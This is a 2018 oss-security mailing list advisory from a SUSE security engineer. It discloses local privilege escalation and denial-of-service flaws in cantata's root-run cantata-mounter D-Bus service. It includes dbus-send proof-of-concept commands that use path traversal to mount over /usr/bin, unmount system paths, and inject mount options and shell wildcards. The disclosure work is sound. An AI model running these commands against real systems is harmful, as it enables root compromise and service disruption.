Products Openwall GNU/*/Linux   server OS Linux Kernel Runtime Guard John the Ripper   password cracker Free & Open Source for any platform in the cloud Pro for Linux Pro for macOS Wordlists   for password cracking passwdqc   policy enforcement Free & Open Source for Unix Pro for Windows (Active Directory) yescrypt   KDF & password hashing yespower   Proof-of-Work (PoW) crypt_blowfish   password hashing phpass   ditto in PHP tcb   better password shadowing Pluggable Authentication Modules scanlogd   port scan detector popa3d   tiny POP3 daemon blists   web interface to mailing lists msulogin   single user mode login php_mt_seed   mt_rand() cracker Services Publications Articles Presentations Resources Mailing lists Community wiki Source code repositories (GitHub) Source code repositories (CVSweb) File archive & mirrors How to verify digital signatures OVE IDs What's new

Date: Mon, 18 Jun 2018 11:08:36 +0200
From: Matthias Gerstner <mgerstner@...e.de>
To: oss-security@...ts.openwall.com
Subject: cantata: cantata-mounter D-Bus service local privilege escalation
 and other security issues

Hello list,

this is a report about local privilege and local denial of service
issues found in cantata, a graphical client for MPD
(<https://github.com/CDrummond/cantata/wiki/About-Cantata>).

cantata supports a D-Bus helper daemon "cantata-mounter" for mounting
remote samba shares by calling `mount.cifs` on Linux systems. This
daemon is configured for on-demand activation, running as root and its
D-Bus interface is accessible by unprivileged users by default.

The daemon code is part of cantata since version 2.0.0 and it is built
by default in versions 2.3.0 and 2.3.1. Before 2.3.0 it was only built
if `-DENABLE_REMOTE_DEVICES=ON` was passed to the cmake invocation.

Due to the issues explained below the upstream maintainer decided to
drop the D-Bus service completely from future versions. This already
happened through upstream commit afc4f8315d3e96574925fb530a7004cc9e6ce3d3.
Therefore there are no fixes available except not building and shipping
the D-Bus service in question.

Following are four distinct security issues found in the
cantata-mounter D-Bus service:

A) The mount target path check in mounter.cpp `mpOk()` is insufficient.
  A regular user can this way mount a CIFS filesystem anywhere, and not
  just beneath /home by passing relative path components. Example D-Bus
  call:

  dbus-send --system --print-reply --dest=mpd.cantata.mounter /Mounter mpd.cantata.mounter.mount 'string:smb://workgroup\user:password@...t:port/path?domain=domain' string:/home/../usr/bin int32:$$ int32:0 int32:0

  By replacing data in system paths like /usr/bin by data from an
  attacker controlled samba share, a local attacker can cause root to
  execute modified programs or to read modified configuration files.
  Therefore it opens the avenue for a local root escalation.

B) Arbitrary unmounts can be performed by regular users the same way.
  For example this D-Bus call unmounts /sys/kernel/security:

  dbus-send --system --print-reply --dest=mpd.cantata.mounter /Mounter mpd.cantata.mounter.umount string:/home/../sys/kernel/security int32:$$

  This allows for a local denial of service and possible further
  unspecified kinds of system manipulation.

C) A regular user can inject additional mount options like file_mode= by
  manipulating e.g. the domain parameter of the samba URL. This D-Bus
  call injects the 'file_mode=777' parameter:

  dbus-send --system --print-reply --dest=mpd.cantata.mounter /Mounter mpd.cantata.mounter.mount 'string:smb://workgroup\user@...t:port/path?domain=domain,file_mode=777' string:/home/user int32:$$ int32:0 int32:0

  This way the user can use all options that mount.cifs offers to e.g.
  produce files with arbitrary ownership and mode.

D) The wrapper script 'mount.cifs.wrapper' uses the shell to forward the
  arguments to the actual mount.cifs binary. The shell evaluates
  wildcards which can also be injected like this:

  dbus-send --system --print-reply --dest=mpd.cantata.mounter /Mounter mpd.cantata.mounter.mount 'string:smb://workgroup\user:password@...t:port/path?domain=domain' 'string:/home/../tmp/*' int32:$$ int32:0 int32:0

  In this case all files in /tmp/* will be expanded and passed to
  mount.cifs as parameters. This shouldn't allow further attack vectors,
  because there are no additional arguments that mount.cifs supports.
  But it still shouldn't happen.

  The reason for "Calling mount.cifs directly from DBUS service seems to
  mess things up?" which is stated in 'mount.cifs.wrapper' most probably
  is that the D-Bus service has an empty PATH variable and can't find
  mount.cifs. At least it is this way on openSUSE Tumbleweed where I
  tested this.

Furthermore the mount D-Bus method allows unprivileged users to specify
the owner uid and gid of the mounted samba shared (passed as `uid=` and
`gid=` mount.cifs parameters). The daemon should instead determine the
callers uid and gid and use them, because this way the user can produce
files with arbitrary user and group ownership, which is normally not
possible.

Cheers

Matthias

-- 
Matthias Gerstner <matthias.gerstner@...e.de>
Dipl.-Wirtsch.-Inf. (FH), Security Engineer
https://www.suse.com/security
Telefon: +49 911 740 53 290
GPG Key ID: 0x14C405C971923553

SUSE Linux GmbH
GF: Felix Imendörffer, Jane Smithard, Graham Norton
HRB 21284 (AG Nuernberg)

Download attachment "signature.asc" of type "application/pgp-signature" (834 bytes)

Powered by blists - more mailing lists

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Confused about mailing lists and their use? Read about mailing lists on Wikipedia and check out these guidelines on proper formatting of your messages.